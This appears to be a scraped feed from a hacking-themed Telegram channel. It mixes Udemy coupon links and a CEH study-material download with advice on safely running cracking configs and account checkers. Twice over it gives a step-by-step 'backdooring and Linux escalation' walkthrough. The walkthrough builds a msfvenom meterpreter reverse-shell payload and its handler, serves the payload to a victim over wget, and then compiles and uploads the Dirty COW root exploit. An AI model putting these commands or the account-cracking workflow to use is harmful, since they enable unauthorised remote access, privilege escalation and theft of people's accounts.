π° How To Use Cracking Configs/Account Checkers /Other Hacking/Cracking Tools For Free Without Viruses or without getting hackedπ°
β‘οΈGet An HQ Antivirus
like Avast, Malwarebytes,Avira,AVG, Kaspersky Etc etc
β‘οΈGet an VM software or crack recommended VM.Ware or Oracle VM....
β‘οΈ If your specs are low Then download SandBoxie /Any other sorts of Sandbox...
β‘οΈMake a protetced folder/directory where you will store your crack/hacking/checker tools..... and keep the folder locked and secure
β‘οΈCreate another user in Windows without/with Admin Privileges this can reduce the hacking risk....
β‘οΈafter hacking/cracking/checking always put the results in Gdrive/Telegram/Mega or any other clouds...
β‘οΈ always check if firewall is on and gets highest/mid permission
#share & #supportus
-----------------> @geekcode π
Share as more as π
β‘οΈGet An HQ Antivirus
like Avast, Malwarebytes,Avira,AVG, Kaspersky Etc etc
β‘οΈGet an VM software or crack recommended VM.Ware or Oracle VM....
β‘οΈ If your specs are low Then download SandBoxie /Any other sorts of Sandbox...
β‘οΈMake a protetced folder/directory where you will store your crack/hacking/checker tools..... and keep the folder locked and secure
β‘οΈCreate another user in Windows without/with Admin Privileges this can reduce the hacking risk....
β‘οΈafter hacking/cracking/checking always put the results in Gdrive/Telegram/Mega or any other clouds...
β‘οΈ always check if firewall is on and gets highest/mid permission
#share & #supportus
-----------------> @geekcode π
Share as more as π
β Certified Ethical Hacker (CEH) V11 - ECCOUNCIL - Study Materials & Labs β
Certified Ethical Hacker CEH v11 will teach you the latest commercial-grade hacking tools, techniques, and methodologies used by hackers and information security professionals to lawfully hack an organization.
https://www.eccouncil.org/programs/certified-ethical-hacker-ceh/
Download :
https://gofile.io/d/GOkkBg
#share & #supportus
----------------> @geekcode π
Share as more as π
Certified Ethical Hacker CEH v11 will teach you the latest commercial-grade hacking tools, techniques, and methodologies used by hackers and information security professionals to lawfully hack an organization.
https://www.eccouncil.org/programs/certified-ethical-hacker-ceh/
Download :
https://gofile.io/d/GOkkBg
#share & #supportus
----------------> @geekcode π
Share as more as π
https://www.udemy.com/course/flutter-advanced-course/
#share & #supportus
------------------> @geekcode π
Share as more as π
#share & #supportus
------------------> @geekcode π
Share as more as π
Udemy
Flutter - Advanced Course
Learn to be a Flutter advanced programmer
π Flutter β Beginners Course
https://www.udemy.com/course/flutters-beginners-course/?couponCode=302FF25C20EF190599CC
π Flutter - Intermediate Course
https://www.udemy.com/course/flutter-intermediate/?couponCode=E052B43BC3857BCB7CC6
π Flutter β Advanced Course
https://www.udemy.com/course/flutter-advanced-course/?couponCode=8D6CF01C8FCA47C9D4FF
π Dart β Beginners Course
https://www.udemy.com/course/dart-beginners-course/?couponCode=7CA93B47A390A81961E3
π Dart - Intermediate Course
https://www.udemy.com/course/dart-intermediate-course/?couponCode=9F2334BF6BAFE0E351ED
π Dart β Advanced Course
https://www.udemy.com/course/dart-advanced-course/?couponCode=CC349004C48D29816053
#share & #supportus
----------------> @geekcode π
Share as more as π
https://www.udemy.com/course/flutters-beginners-course/?couponCode=302FF25C20EF190599CC
π Flutter - Intermediate Course
https://www.udemy.com/course/flutter-intermediate/?couponCode=E052B43BC3857BCB7CC6
π Flutter β Advanced Course
https://www.udemy.com/course/flutter-advanced-course/?couponCode=8D6CF01C8FCA47C9D4FF
π Dart β Beginners Course
https://www.udemy.com/course/dart-beginners-course/?couponCode=7CA93B47A390A81961E3
π Dart - Intermediate Course
https://www.udemy.com/course/dart-intermediate-course/?couponCode=9F2334BF6BAFE0E351ED
π Dart β Advanced Course
https://www.udemy.com/course/dart-advanced-course/?couponCode=CC349004C48D29816053
#share & #supportus
----------------> @geekcode π
Share as more as π
Udemy
Flutter - Beginners Course
Learn Flutter mobile programming
Linux for Cloud & Devops Engineers
https://www.udemy.com/course/valaxy-linux/?couponCode=BLACK-FRIDAY
#share & #supportus
----------------> @geekcode π
Share as more as π
https://www.udemy.com/course/valaxy-linux/?couponCode=BLACK-FRIDAY
#share & #supportus
----------------> @geekcode π
Share as more as π
Udemy
Linux for Cloud & DevOps Engineers
Linux basics about files, directories, installations, networking, system configuration, user management etc...
ANDROID PROGRAMMING BOOKS DOWNLOAD HERE β₯οΈ
#share & #supportus
------------------> @geekcode π
Share as more as π
#share & #supportus
------------------> @geekcode π
Share as more as π
https://www.udemy.com/course/wireshark-packet-analysis-and-ethical-hacking-core-skills/?couponCode=THANKSGIVING
#share & #supportus
--------------------> @geekcodeπ
Share as more as π
#share & #supportus
--------------------> @geekcodeπ
Share as more as π
Udemy
Wireshark: Packet Analysis and Ethical Hacking: Core Skills
From basic to advanced network analysis using Wireshark! Ethical Hacking using Kali Linux: Passwords, Security, Protocol
Kali Linux Essentials For Ethical Hackers - Beginners Guide!
Enroll here -:
https://www.udemy.com/course/kali-linux-essentials-for-ethical-hackers-beginners-guide/?couponCode=SSTEC3D
#share & #supportus
------------------> @geekcode π
Share as more as π
This course will teach you the basics of using the Kali linux essentials commands requried to get into ethical hacking!Enroll here -:
https://www.udemy.com/course/kali-linux-essentials-for-ethical-hackers-beginners-guide/?couponCode=SSTEC3D
#share & #supportus
------------------> @geekcode π
Share as more as π
π°BACKDOORING & LINUX ESCALATIONπ°
Do this :-
1] msfvenom -p python/meterpreter/reverse_tcp -f raw \ --platform python -a python -e generic/none LHOST=someip LPORT=someport \ >'somedir/filename.py'
2] -p payload
-f fileformat
-e encoder
> raw output
3] Writing resource file
touch python_
Now copy and paste these commands
cat >>python_
use multi/handler
set payload python/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 4444
set ExitOnSession false
exploit -j
4] msfconsole -q (quite) -x to (execute command exec)
loading resource file to start multi/handler
msfconsole -q -r python_
5] now move python.py payload to webroot dir
mv python.py /var/www/html/
sending payload to victim using wget
wget http://ip/python.py
spawing python shell
Now local root privilege exploit dirtyc0w comes in picture
what is dirtyc0w ?
dirtyc0w is local root exploit
how does dirtyc0w work ?
dirtc0w backdoors /etc/passwd file to gain root access on target
and overwrites itself to kernels memory
6] before running any exploits recon is very important
so we verify -- / kernel info / os version / codename / --
uname --all
7] cat /etc/*release
download the exploit here
Code:-
wget https://exploit-db/download/40616.c
now compiling the source
Code:-
gcc 40616.c -o dirtyc0w -pthread
now upload the compiled binary to target
upload dirtyc0w [using meterpreter]
and execute the programm
./dirtyc0w
#share & #supportus
---------------> @geekcode π
Content by owner π
Share as more as π
Do this :-
1] msfvenom -p python/meterpreter/reverse_tcp -f raw \ --platform python -a python -e generic/none LHOST=someip LPORT=someport \ >'somedir/filename.py'
2] -p payload
-f fileformat
-e encoder
> raw output
3] Writing resource file
touch python_
Now copy and paste these commands
cat >>python_
use multi/handler
set payload python/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 4444
set ExitOnSession false
exploit -j
4] msfconsole -q (quite) -x to (execute command exec)
loading resource file to start multi/handler
msfconsole -q -r python_
5] now move python.py payload to webroot dir
mv python.py /var/www/html/
sending payload to victim using wget
wget http://ip/python.py
spawing python shell
Now local root privilege exploit dirtyc0w comes in picture
what is dirtyc0w ?
dirtyc0w is local root exploit
how does dirtyc0w work ?
dirtc0w backdoors /etc/passwd file to gain root access on target
and overwrites itself to kernels memory
6] before running any exploits recon is very important
so we verify -- / kernel info / os version / codename / --
uname --all
7] cat /etc/*release
download the exploit here
Code:-
wget https://exploit-db/download/40616.c
now compiling the source
Code:-
gcc 40616.c -o dirtyc0w -pthread
now upload the compiled binary to target
upload dirtyc0w [using meterpreter]
and execute the programm
./dirtyc0w
#share & #supportus
---------------> @geekcode π
Content by owner π
Share as more as π